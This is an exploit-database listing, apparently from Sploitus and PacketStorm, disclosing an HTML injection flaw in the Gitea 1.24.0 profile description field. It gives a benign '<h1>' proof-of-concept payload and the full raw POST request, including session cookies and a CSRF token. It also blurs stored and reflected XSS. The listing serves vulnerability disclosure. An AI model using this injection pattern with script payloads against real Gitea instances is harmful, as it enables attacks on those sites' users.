Exploit for Gitea 1.24.0 Cross Site Scripting

Name: Exploit for Gitea 1.24.0 Cross Site Scripting
Rating: 5 (19 reviews)
2025-03-24 | CVSS 6.6
## https://sploitus.com/exploit?id=PACKETSTORM:189980
# Exploit Title: Gitea 1.24.0 - HTML Injection
    # Date: 2025-03-09
    # Exploit Author: Mikail KOCADAĞ
    # Vendor Homepage: https://gitea.com
    # Software Link: https://dl.gitea.io/gitea/1.24.0/
    # Version: 1.24.0
    # Tested on: Windows 10, Linux Ubuntu 22.04
    # CVE : N/A
    
    ## Vulnerability Description:
    In Gitea 1.24.0, the "description" parameter on the user settings page is vulnerable to HTML Injection and potentially Reflected XSS. The user-supplied HTML content is not properly sanitized, allowing it to be executed in the browser. When a user saves their profile description containing malicious HTML or JavaScript code, the payload successfully executes, confirming the vulnerability.
    
    ## Exploit PoC:
    [https://lh7-rt.googleusercontent.com/docsz/AD_4nXeh7FQb3EdM3-fPqRLqZ4Oh5JlVQdHjhBHEtPL5U9mEtTeWwiMdfx1SpyYC-Kg7EiWCy-Mpay8ZKz6WDw5hCYLrbCrAN2Dlg5xAnNIMuL9ui8ZNjH9GzD_rwdtjbGRkyoTP-uAd?key=pDzgPVQKg3NL0T6shAZ0U6Xz][https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-OZUDyqxfXQV92GwjmahRYFv7BzYhJ5lG2F6slXNyRVRcgyB2yNbK_NMkFkWbU6IggK4xOkUDP5aukMiEjFS18zIc3DDUR7M0wivQMF2aWRt91yx_ayb7AB556Uot1LVUaa1z8w?key=pDzgPVQKg3NL0T6shAZ0U6Xz]
    
    ## Paload:<h1>deneme</h1>
    ### **1. Request:**
    POST /user/settings HTTP/2
    Host: demo.gitea.com
    Cookie: _gid=GA1.2.1249205656.1740139988; _ga=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ced; lang=tr-TR; _ga_WBKVZF2YXD=GS1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
    Content-Length: 312
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: tr-TR,tr;q=0.9
    Origin: null
    Content-Type: application/x-www-form-urlencoded
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Priority: u=0, i
    
    _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
    &full_name=Abuzettin
    &description=%3Ch1%3Edeneme%3C%2Fh1%3E
    &website=
    &location=
    &visibility=0
    &keep_email_private=on